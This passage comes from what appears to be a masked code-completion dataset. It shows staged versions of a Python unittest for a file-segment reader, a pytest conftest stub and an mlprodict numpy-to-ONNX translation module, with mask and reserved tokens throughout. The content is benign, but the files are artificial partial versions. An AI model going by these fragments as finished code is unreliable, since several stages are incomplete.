len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment('name', 'file name')\n line = (\n ' SNIPPET START A=B B=13 K=\\'ha mi\\' ZIG=\"ZA G\" WITH hami -> \"mami\" '\n )\n FileReader('whatnot', ['onces']).analyze_parameters(line, segment)\n self.assertEqual(segment.parameters['A'], 'B')\n self.assertEqual(segment.parameters['B'], '13')\n self.assertEqual(segment.parameters['K'], 'ha mi')\n self.assertEqual(segment.parameters['ZIG'], 'ZA G')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment('name', 'file name')\n line = (\n ' SNIPPET START A=B B=13 K=\\'ha mi\\' ZIG=\"ZA G\" WITH hami -> \"mami\" '\n )\n FileReader('whatnot', ['onces']).analyze_parameters(line, segment)\n self.assertEqual(segment.parameters['A'], 'B')\n self.assertEqual(segment.parameters['B'], '13')\n self.assertEqual(segment.parameters['K'], 'ha mi')\n self.assertEqual(segment.parameters['ZIG'], 'ZA G')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom pyama.filereader import FileReader, Segment\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment('name', 'file name')\n line = (\n ' SNIPPET START A=B B=13 K=\\'ha mi\\' ZIG=\"ZA G\" WITH hami -> \"mami\" '\n )\n FileReader('whatnot', ['onces']).analyze_parameters(line, segment)\n self.assertEqual(segment.parameters['A'], 'B')\n self.assertEqual(segment.parameters['B'], '13')\n self.assertEqual(segment.parameters['K'], 'ha mi')\n self.assertEqual(segment.parameters['ZIG'], 'ZA G')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#! /usr/bin/python\n# -*- coding: utf8 -*-\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport unittest\n\nfrom pyama.filereader import FileReader,Segment\n\n\nclass TestFileReader(unittest.TestCase):\n def test_reads_file(self):\n reader = FileReader(\n \"sample_reader_test.txt\",\n regexes=[(r'name=\"(\\w+)\"', 'END SEGMENT'),\n (r'\\s*\\*\\s*START\\s*(\\w+)', 'END SEGMENT'),\n (r\"PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)\", None)]\n )\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment(\"name\",\"file name\")\n line = \"\"\" SNIPPET START A=B B=13 K='ha mi' ZIG=\"ZA G\" WITH hami -> \"mami\" \"\"\"\n FileReader(\"whatnot\",[\"onces\"]).analyze_parameters(line,segment)\n self.assertEqual(segment.parameters[\"A\"],\"B\")\n self.assertEqual(segment.parameters[\"B\"],\"13\")\n self.assertEqual(segment.parameters[\"K\"],\"ha mi\")\n self.assertEqual(segment.parameters[\"ZIG\"],\"ZA G\")\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import pytest
<|reserved_special_token_1|>
"""
======================
@author:小谢学测试
@time:2021/9/8:8:34
@email:xie7791@qq.com
======================
"""
import pytest
# @pytest.fixture()
# def login():
# print("登录方法")
# def pytest_conftest(config):
# marker_list = ["search","login"]
# for markers in marker_list:
# config.addinivalue_line("markers",markers)
|
flexible
|
{
"blob_id": "b52429f936013ac60659950492b67078fabf3a13",
"index": 4042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nimport pytest\n",
"step-3": "\"\"\"\n======================\n@author:小谢学测试\n@time:2021/9/8:8:34\n@email:xie7791@qq.com\n======================\n\"\"\"\nimport pytest\n# @pytest.fixture()\n# def login():\n# print(\"登录方法\")\n\n# def pytest_conftest(config):\n# marker_list = [\"search\",\"login\"]\n# for markers in marker_list:\n# config.addinivalue_line(\"markers\",markers)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""
@file
@brief One class which visits a syntax tree.
"""
import inspect
import ast
from textwrap import dedent
import numpy
from scipy.spatial.distance import squareform, pdist
from .node_visitor_translator import CodeNodeVisitor
def py_make_float_array(cst, op_version=None):
"""
Creates an array with a single element
from a constant.
@param cst constant
@param op_version unused
@return array
.. runpython::
:showcode:
:warningout: DeprecationWarning
from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array
print(py_make_float_array(5.5))
"""
return numpy.array([cst], dtype=numpy.float32)
def py_pow(x, p, op_version=None):
"""
Function for python operator ``**``.
@param x float
@param p power
@param op_version unused
@return :math:`x^p`
"""
return x ** p
def py_mul(*x, op_version=None):
"""
Function for python operator ``*``.
@param x floats
@param op_version unused
@return `x*y`
"""
if len(x) == 2:
return x[0] * x[1]
p = x[0]
for y in x[1:]:
p *= y
return p
def py_opp(x, op_version=None):
"""
Function for python unary operator ``-``.
@param x floats
@param op_version unused
@return `-x`
"""
return -x
def squareform_pdist(X, metric='sqeuclidean', op_version=None):
"""
Replacements for `squareform
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_
and `pdist
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.
"""
return squareform(pdist(X, metric=metric))
def get_default_context():
"""
Returns a default context useful for most of the conversion
from a function using :epkg:`numpy` into :epkg:`ONNX`.
"""
context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,
'py_mul': py_mul, 'py_opp': py_opp,
'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}
allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide'
'equal exp floor greater invert less log matmul maximum minimum mod'
'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())
for k, v in numpy.__dict__.items():
if k not in allow:
continue
context[f'numpy.{k}'] = v
context[f'np.{k}'] = v
return context
def get_default_context_cpl():
"""
Returns a default useful context to compile the converter
returned by @see fn translate_fct2onnx.
"""
ctx = {'py_make_float_array': py_make_float_array,
'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,
'numpy': numpy}
try:
from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed
from skl2onnx.algebra.complex_functions import onnx_cdist # delayed
ctx['onnx_squareform_pdist'] = onnx_squareform_pdist
ctx['onnx_cdist'] = onnx_cdist
except ImportError: # pragma: no cover
# Too old version for skl2onnx.
pass
from skl2onnx.algebra import onnx_ops # delayed
from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed
d = onnx_ops.__dict__
for k, v in d.items():
try:
if k.startswith("Onnx") and issubclass(v, OnnxOperator):
ctx[k] = v
except TypeError as e:
if inspect.isfunction(v):
continue
raise RuntimeError( # pragma: no cover
f"Issue with {k}={v} (type={type(v)})") from e
return ctx
def translate_fct2onnx(fct, context=None, cpl=False,
context_cpl=None, output_names=None,
dtype=numpy.float32,
verbose=0, fLOG=None):
"""
Translates a function into :epkg:`ONNX`. The code it produces
is using classes *OnnxAbs*, *OnnxAdd*, ...
@param fct function to convert
@param context context of the function to convert
something like ``{'numpy.transpose': numpy.transpose}``,
if *context* is None, it receives a default value
returnd by @see fn get_default_context
@param cpl compile the function after it was
created
@param context_cpl context used at compiling time
if *context_cpl* is None, it receives a default value
returnd by @see fn get_default_context_cpl
@param output_names names of the output in the :epkg:`ONNX` graph
@param dtype :epkg:`numpy` float type used to produce the model
@param verbose integer, display more information
@param fLOG logging function
@return code or compiled code
.. exref::
:title: Convert a function into ONNX code
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx2.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
onnx_code = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose})
print(onnx_code)
Next example goes further and compile the outcome.
.. exref::
:title: Convert a function into ONNX code and run
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed. The example executes the function,
creates an :epkg:`ONNX` then uses @see cl OnnxInference
to compute *predictions*. Finally it compares
them to the original.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx3.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
from mlprodict.plotting.text_plot import onnx_simple_text_plot
from mlprodict.onnxrt import OnnxInference
from mlprodict.npy.xop import loadop
OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(
'Add', 'Transpose', 'Mul', 'Identity')
ctx = {'OnnxAdd': OnnxAdd,
'OnnxTranspose': OnnxTranspose,
'OnnxMul': OnnxMul,
'OnnxIdentity': OnnxIdentity}
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),
'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}
original = trs(inputs['x'], inputs['y'])
print('original output:', original)
onnx_fct = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose},
cpl=True, context_cpl=ctx, output_names=['Z'])
onnx_code = onnx_fct('x', 'y', op_version=12)
onnx_g = onnx_code.to_onnx(inputs, target_opset=12)
print("ONNX model")
print(onnx_simple_text_plot(onnx_g))
oinf = OnnxInference(onnx_g)
res = oinf.run(inputs)
print('-----------')
print("ONNX inference:", res['Z'])
The function to be converted may include python functions
which must not be converted. In that case, their name
must be prefixed by ``py_``. The execution of the function
this one builds produces the following error::
TypeError: Parameter to MergeFrom() must be instance of same class:
expected onnx.TensorProto got onnx.AttributeProto.
It indicates that constants in the code marges multiple types,
usually floats and tensor of floats. Floats should be converted
using the following function::
def py_make_float_array(cst):
return numpy.array([cst], dtype=numpy.float32)
The function replaces empty contexts by default values which
covers many :epkg:`numpy` functions. The tutorial
:ref:`l-onnx-tutorial` gives an example of how it can be used
on a more complex function.
"""
def compile_code(name, code, context=None):
"""
Compiles a python function with the given
context.
@param name function name
@param code python code
@param context context used at compilation
@return compiled function
"""
if context is None:
context = {} # pragma: no cover
try:
obj = compile(code, "", "exec")
except SyntaxError as e: # pragma: no cover
raise SyntaxError(f"Unable to compile\n{code}") from e
context_g = context.copy()
context_l = context.copy()
exec(obj, context_g, context_l) # pylint: disable=W0122
return context_l[name]
if isinstance(fct, str):
code = fct
elif callable(fct):
code = inspect.getsource(fct)
else:
raise TypeError( # pragma: no cover
f"Unable to guess code from type {type(fct)}.")
node = ast.parse(dedent(code))
v = CodeNodeVisitor()
v.visit(node)
if context is None:
context = get_default_context()
onnx_code = v.export(context=context,
output_names=output_names)
if not cpl:
return onnx_code
if verbose > 0 and fLOG is not None: # pragma: no cover
fLOG('[translate_fct2onnx] python code')
fLOG(code)
fLOG('[translate_fct2onnx] ONNX code')
fLOG(onnx_code)
if context_cpl is None:
context_cpl = get_default_context_cpl()
if 'numpy' not in context_cpl:
context_cpl = context_cpl.copy()
context_cpl['numpy'] = numpy
return compile_code(fct.__name__, onnx_code, context_cpl)
|
normal
|
{
"blob_id": "fdf6c28e65b50c52550a95c2d991b1eb3ec53a2f",
"index": 3540,
"step-1": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\n<mask token>\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-2": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-3": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context():\n \"\"\"\n Returns a default context useful for most of the conversion\n from a function using :epkg:`numpy` into :epkg:`ONNX`.\n \"\"\"\n context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,\n 'py_mul': py_mul, 'py_opp': py_opp, 'cdist': 'cdist',\n 'squareform_pdist': 'squareform_pdist'}\n allow = set(\n 'abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divideequal exp floor greater invert less log matmul maximum minimum modmultiply power sign sin sinh sqrt square subtract tan 